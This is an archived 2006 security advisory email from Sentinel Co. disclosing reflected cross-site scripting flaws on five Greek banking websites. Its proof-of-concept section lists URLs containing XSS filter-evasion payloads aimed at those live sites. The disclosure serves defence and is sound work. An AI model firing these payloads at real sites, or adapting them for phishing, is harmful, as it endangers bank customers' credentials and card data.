This is a multi-part message in MIME format. ------=_NextPart_000_000B_01C6DC9B.6E911000 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sentinel Computer Security Advisory Sentinel Co. http://www.sentinel.gr info@sentinel.gr General Flaw Description : Cross Site Scripting Vulnerabilities in = multiple Greek Web Banking sites. -------------------------------------------------------------------------= ------ Advisory Information -------------------------------------------------------------------------= ------ Advisory Release Date : 2006/09/01 Advisory ID : SGA-0002 Extends : None Deprecates : None -------------------------------------------------------------------------= ------ Product Information -------------------------------------------------------------------------= ------ Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx, http://www.winbank.gr/eCPage.asp, http://www.emporiki.gr/cbg/gr/search/search.jsp, http://www.piraeusbank.gr/ecportal.asp, http://www.probank.gr/search/index.php -------------------------------------------------------------------------= ------ Vulnerability Information -------------------------------------------------------------------------= ------ Flaw Type : Cross Site Scripting Vulnerability Impact : Phising and Scam attacks Vulnerability Rating : Critical Patch Status : Partially Patched Advisory Status : Verified Publicity Level : Published Other Advisories IDs : None Flaw Discovery Date : 2006/08/31 Patch Date : 2006/09/02 Vulnerability Credit : Emmanouil Gavriil (egavriil@sentinel.gr) Exploit Status : Not Released Exploit Publication Date : None -------------------------------------------------------------------------= ------ Description ----------- Many Greek banks are using Web Banking service to assist their customers = with=20 their transactions. Eurobank, Winbank, Pireaus Bank, Probank and = Emporiki Bank=20 found to be vulnerable to Cross Site Scripting Attacks which can lead to = execution of arbitrary SCRIPT and HTML code to the user.=20 Technical Information --------------------- www.eurobank.gr is making use of multiple aspx files which fail to = sanitise variables. Most of aspx files in Eurobank website which are getting = variables as input are vulnerable to XSS. www.winbank.gr is using a search function which does not properly = sanitise the input of variable text_search. www.emporiki.gr is using a jsp search function which does not properly = sanitise the input of variable searchFld. www.piraeusbank.gr is having exactly the same problem with Winbank as it = is actually the same bank. Even though it doesn't have a Web Banking System itself, it forwards Web Banking requests to winbank. Cross Site = Scripting is possible, and thus the danger is the same, as an unsuspicious user = can be lead from www.piraeusbank.gr with a valid redirection to a fake = www.winbank.gr login screen. www.probank.gr doesn't have a Web Banking Service but the site is = vulnerable to XSS and while account compromise is not possible, valuable = information such as CARD and PIN numbers can be stolen through phising/scam attacks. Proof of Concept Experiment --------------------------- http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(= 88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fro= mCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/S= CRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=3D= &{} http://www.winbank.gr/eCPage.asp?Page=3DeCFullSearchResults.asp&lang=3D1&= text_search=3D%3Cscript%3Ealert('XSS')%3C/script%3E http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=3D';alert(Strin= g.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;a= lert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83= ,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83)= )%3C/SCRIPT%3E=3D&{} http://www.piraeusbank.gr/ecportal.asp?id=3D235212&nt=3D107&pageno=3D1&fr= omsearch=3D234010&lang=3D2&tid=3D&txtSearch=3D%3Cscript%3Ealert('XSS')%3C= /script%3E http://www.probank.gr/search/index.php?qu=3D';alert(String.fromCharCode(8= 8,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.from= CharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SC= RIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=3D= &{} Patch Description and Information --------------------------------- Banks informed. All banks except Emporiki Bank have fixed the = vulnerability. References and Other Resources for Information ---------------------------------------------- None. EOF. ------=_NextPart_000_000B_01C6DC9B.6E911000 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Sentinel Computer = Security Advisory Sentinel Co. http://www.sentinel.gr info@sentinel.gr General Flaw Description : Cross Site Scripting Vulnerabilities in = multiple Greek Web Banking sites. -------------------------------------------------------------------------= ------ Advisory Information -------------------------------------------------------------------------= ------ Advisory Release Date : 2006/09/01 Advisory ID : SGA-0002 Extends : None Deprecates : None -------------------------------------------------------------------------= ------ Product Information -------------------------------------------------------------------------= ------ Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx, http://www.winbank.gr/eCPage.asp, http://www.emporiki.gr/cbg/gr/search/search.jsp, http://www.piraeusbank.gr/ecportal.asp, http://www.probank.gr/search/index.php -------------------------------------------------------------------------= ------ Vulnerability Information -------------------------------------------------------------------------= ------ Flaw Type : Cross Site Scripting Vulnerability Impact : Phising and Scam attacks Vulnerability Rating : Critical Patch Status : Partially Patched Advisory Status : Verified Publicity Level : Published Other Advisories IDs : None Flaw Discovery Date : 2006/08/31 Patch Date : 2006/09/02 Vulnerability Credit : Emmanouil Gavriil (egavriil@sentinel.gr) Exploit Status : Not Released Exploit Publication Date : None -------------------------------------------------------------------------= ------ Description ----------- Many Greek banks are using Web Banking service to assist their customers = with=20 their transactions. Eurobank, Winbank, Pireaus Bank, Probank and = Emporiki Bank=20 found to be vulnerable to Cross Site Scripting Attacks which can lead to = execution of arbitrary SCRIPT and HTML code to the user.=20 Technical Information --------------------- www.eurobank.gr is making use of multiple aspx files which fail to = sanitise variables. Most of aspx files in Eurobank website which are getting = variables as input are vulnerable to XSS. www.winbank.gr is using a search function which does not properly = sanitise the input of variable text_search. www.emporiki.gr is using a jsp search function which does not properly = sanitise the input of variable searchFld. www.piraeusbank.gr is having exactly the same problem with Winbank as it = is actually the same bank. Even though it doesn't have a Web Banking System itself, it forwards Web Banking requests to winbank. Cross Site = Scripting is possible, and thus the danger is the same, as an unsuspicious user = can be lead from www.piraeusbank.gr with a valid redirection to a fake = www.winbank.gr login screen. www.probank.gr doesn't have a Web Banking Service but the site is = vulnerable to XSS and while account compromise is not possible, valuable = information such as CARD and PIN numbers can be stolen through phising/scam attacks. Proof of Concept Experiment --------------------------- http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(= 88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fro= mCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/S= CRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=3D= &{} http://www.winbank.gr/eCPage.asp?Page=3DeCFullSearchResults.asp&lang=3D= 1&text_search=3D%3Cscript%3Ealert('XSS')%3C/script%3E http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=3D';alert(Strin= g.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;a= lert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83= ,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83)= )%3C/SCRIPT%3E=3D&{} http://www.piraeusbank.gr/ecportal.asp?id=3D235212&nt=3D107&pagen= o=3D1&fromsearch=3D234010&lang=3D2&tid=3D&txtSearch=3D%3C= script%3Ealert('XSS')%3C/script%3E http://www.probank.gr/search/index.php?qu=3D';alert(String.fromCharCode(8= 8,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.from= CharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SC= RIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=3D= &{} Patch Description and Information --------------------------------- Banks informed. All banks except Emporiki Bank have fixed the = vulnerability. References and Other Resources for Information ---------------------------------------------- None. EOF.